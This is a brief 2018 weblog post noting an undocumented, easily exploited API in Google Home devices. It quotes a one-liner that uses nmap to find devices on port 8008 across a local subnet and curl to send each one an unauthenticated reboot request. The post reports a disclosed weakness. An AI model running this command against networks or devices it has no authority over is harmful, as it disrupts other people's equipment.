Flutterby™! : Google Home (in)Security

Next unread comment / Catchup all unread comments User Account Info | Logout | XML/Pilot/etc versions | Long version (with comments) | Weblog archives | Site Map | | Browse Topics

Google Home (in)Security

2018-11-26 17:15:05.024543+01 by Dan Lyke 0 comments

I love one-liner command shell scripts, especially when they're useful: Google Home (in)Security:

TL;DR: An undocumented API in Google home devices is easily exploitable.

This command will reboot any on your local network:

nmap --open -p 8008 192.168.1.0/24 | awk '/is up/ {print up}; {gsub (/\(|\)/,""); up = $NF}' | xargs -I % curl -Lv -H Content-Type:application/json --data-raw '{"params":"now"}' http://%:8008/setup/reboot

[ related topics: broadband ]

comments in ascending chronological order (reverse):